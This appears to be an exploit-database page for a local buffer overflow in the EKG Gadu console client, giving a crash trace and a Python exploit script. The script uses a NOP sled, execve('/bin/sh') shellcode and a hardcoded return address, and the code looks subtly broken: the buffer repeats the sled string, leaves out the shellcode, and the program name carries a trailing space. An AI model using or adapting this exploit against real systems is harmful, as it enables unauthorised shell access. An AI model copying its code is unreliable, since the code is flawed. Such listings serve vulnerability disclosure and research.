EKG Gadu 1.9pre+r2855-3+b1 Local Buffer Overflow

2016.09.20
Credit: Juan Sacco
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

# Exploit developed using Exploit Pack v6.01 # Exploit Author: Juan Sacco - http://www.exploitpack.com - # jsacco@exploitpack.com # Program affected: EKG Gadu # Affected value: USERNAME # Version: 1:1.9~pre+r2855-3+b1 # # Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org # Program description: console Gadu Gadu client for UNIX systems - ncurses UI # EKG ("Eksperymentalny Klient Gadu-Gadu") is an open source # Gadu-Gadu client for UNIX systems. # Kali Linux 2.0 package: pool/main/e/ekg/ekg_1.9~pre+r2855-3+b1_i386.deb # MD5sum: c752577dfb5ea44513a3fb351d431afa # Website: http://ekg.chmurka.net/ # # gdb$ run `python -c 'print "A"*258'` # 0x0807e125 in strlcpy () # gdb$ backtrace # #0 0x0807e125 in strlcpy () # #1 0x080570bb in ioctld_socket () # #2 0x08052e60 in main () import os, subprocess def run(): try: print "# EKG Gadu - Local Buffer Overflow by Juan Sacco" print "# This Exploit has been developed using Exploit Pack - http://exploitpack.com" # NOPSLED + SHELLCODE + EIP buffersize = 240 nopsled = "\x90"*30 shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" eip = "\x20\xf1\xff\xbf" buffer = nopsled * (buffersize-len(shellcode)) + eip subprocess.call(["ekg ",' ', buffer]) except OSError as e: if e.errno == os.errno.ENOENT: print "Sorry, EKG Gadu - Not found!" else: print "Error executing exploit" raise def howtousage(): print "Snap! Something went wrong" sys.exit(-1) if __name__ == '__main__': try: print "Exploit EKG Gadu - Local Overflow Exploit" print "Author: Juan Sacco - Exploit Pack" except IndexError: howtousage() run()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top